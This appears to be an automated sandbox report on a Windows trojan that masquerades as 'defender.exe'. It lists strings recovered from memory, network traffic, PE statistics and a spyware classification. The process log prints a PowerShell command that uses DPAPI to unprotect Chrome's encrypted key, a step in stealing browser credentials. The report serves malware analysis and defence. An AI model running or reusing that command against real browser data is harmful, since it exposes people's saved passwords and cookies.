Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://chromium.dns.nextdns.io
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://cleanbrowsing.org/privacy
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns.google/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns.quad9.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns.sb/privacy/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns10.quad9.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns11.quad9.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACE537000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://myactivity.google.com/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: powershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: fr.pak.0.drString found in binary or memory: https://passwords.google.comCompte
Source: zh-CN.pak.0.drString found in binary or memory: https://passwords.google.comGoogle
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://policies.google.com/
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/IIJ
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/?p=block_warn
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001D.00000000.1776329895.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: zh-CN.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723

System Summary

Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | File dump: defender.exe.0.dr 162041856
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | File dump: defender.exe0.0.dr 162041856
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Process token adjusted: Security
Source: defender.exe0.0.dr | Static PE information: Number of sections : 16 > 10
Source: libEGL.dll.0.dr | Static PE information: Number of sections : 12 > 10
Source: defender.exe.0.dr | Static PE information: Number of sections : 16 > 10
Source: libGLESv2.dll.0.dr | Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.0.dr | Static PE information: Number of sections : 12 > 10
Source: vk_swiftshader.dll.0.dr | Static PE information: Number of sections : 12 > 10
Source: vulkan-1.dll.0.dr | Static PE information: Number of sections : 12 > 10
Source: libEGL.dll0.0.dr | Static PE information: Number of sections : 12 > 10
Source: ffmpeg.dll0.0.dr | Static PE information: Number of sections : 11 > 10
Source: ffmpeg.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal60.spyw.winEXE@29/139@9/7
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsmF81A.tmp
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
